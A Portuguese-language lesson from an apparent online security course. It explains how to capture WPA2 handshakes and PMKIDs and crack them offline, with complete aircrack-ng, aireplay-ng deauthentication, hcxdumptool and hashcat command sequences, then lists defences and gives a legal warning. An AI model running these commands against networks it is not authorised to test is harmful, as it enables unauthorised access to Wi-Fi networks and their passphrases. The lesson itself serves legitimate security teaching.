Captura e Quebra do Handshake WPA2
Capture um handshake de quatro vias com o aircrack-ng e tente ataques de dicionário com o Hashcat.
Captura e Quebra do Handshake WPA2 é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.
A negociação de 4 vias
Quando um cliente se conecta a uma rede WPA2, a negociação de 4 vias deriva a Chave Transitória por Par (PTK) a partir da PMK (derivada da PSK) e de valores aleatórios. Capturar essa negociação permite a quebra de senhas sem conexão.
Configurando o modo monitor
O modo monitor permite que a placa sem fio capture todos os quadros, independentemente do destino, o que é necessário para a captura passiva da negociação. Ele só funciona com placas compatíveis com o modo monitor.
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check killCaptura passiva da negociação
O Airodump-ng captura quadros passivamente. Aguarde um cliente se conectar naturalmente ou force uma reconexão por meio de desautenticação. A captura da negociação aparece no canto superior direito da saída do airodump.
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...Ataque de desautenticação
O envio de quadros de desautenticação falsificados força os clientes conectados a se desconectarem e reconectarem, iniciando uma nova captura da negociação. Essa ação gera muitos sinais e pode ser detectada, além de exigir que o cliente esteja dentro do alcance.
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)Ataque de PMKID: nenhum cliente necessário
O ataque de PMKID (hcxdumptool) captura o PMKID de quadros de sinalização e sondagem sem exigir um cliente conectado. É mais rápido de obter e igualmente suscetível à quebra que uma negociação completa.
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txtQuebrando a negociação com Hashcat
Converta o arquivo de captura e faça um ataque com o modo 22000 do Hashcat (formato unificado do WPA2) ou com o modo 2500 (legado). Utilize rockyou.txt junto com regras para obter os melhores resultados.
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dQuebrando com Aircrack-ng
O Aircrack-ng realiza a quebra de WPA2 baseada em CPU diretamente a partir do arquivo de captura. É mais lento que a quebra em GPU do Hashcat, mas não exige conversão de formato.
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.capEstratégia de lista de palavras
O sucesso da quebra de senhas WPA2 depende inteiramente da qualidade da lista de palavras. Utilize: rockyou.txt como base, conjuntos de regras do Hashcat para mutações, listas específicas da empresa (nome+ano+símbolo) e listas direcionadas obtidas com OSINT.
A realidade do tempo de quebra
Uma senha aleatória de WPA2 com 20 ou mais caracteres é inviável de quebrar computacionalmente. A quebra só é prática contra senhas curtas ou baseadas em dicionário. Por isso, o comprimento e a aleatoriedade da senha são mais importantes que regras de complexidade.
Defesas
Utilize WPA3-SAE (imune a ataques de dicionário sem conexão), ou WPA2 com uma frase-senha aleatória de 20 ou mais caracteres, e WPA2-Enterprise com EAP-TLS (certificados em vez de senhas).
Lembrete legal
Capturar negociações WPA2 em redes que não pertencem a você é ilegal. Todas as técnicas apresentadas aqui se aplicam apenas às suas próprias redes de teste ou a ambientes de laboratório autorizados (por exemplo, laboratório doméstico ou AP dedicado para testes).
Verificação rápida
O que o ataque de PMKID aprimora em relação à captura de negociação padrão?
Resumo: quebra do WPA2
Capturar uma negociação WPA2 (ou um PMKID) transforma a quebra de Wi-Fi em um ataque de dicionário sem conexão. O sucesso depende inteiramente da força da senha: senhas curtas e baseadas em dicionário são quebradas rapidamente, enquanto as longas e aleatórias são praticamente impossíveis de quebrar. Proteja-se com WPA3-SAE, frases-senha fortes e WPA2-Enterprise para redes corporativas.
Aprenda Cyber Security Academy com um tutor de IA — grátis
Escreva e execute código real no seu navegador, obtenha ajuda instantânea de um tutor de IA 24/7 e continue de onde parou na web ou no app.
- Cursos
- 76
- Aulas
- 303
Perguntas Frequentes
A aula “Captura e Quebra do Handshake WPA2” é grátis?
Sim — o texto completo de “Captura e Quebra do Handshake WPA2” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.
O que vou aprender em “Captura e Quebra do Handshake WPA2”?
Capture um handshake de quatro vias com o aircrack-ng e tente ataques de dicionário com o Hashcat. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Cyber Security Academy?
Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.
Quanto tempo leva a aula “Captura e Quebra do Handshake WPA2”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Cyber Security Academy?
Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Protocolos de Segurança 802.11: WEP, WPA2 e WPA3
- Captura e Quebra do Handshake WPA2
- Ataques Evil Twin e de Portal Cativo
- Wi-Fi Empresarial: EAP e RADIUS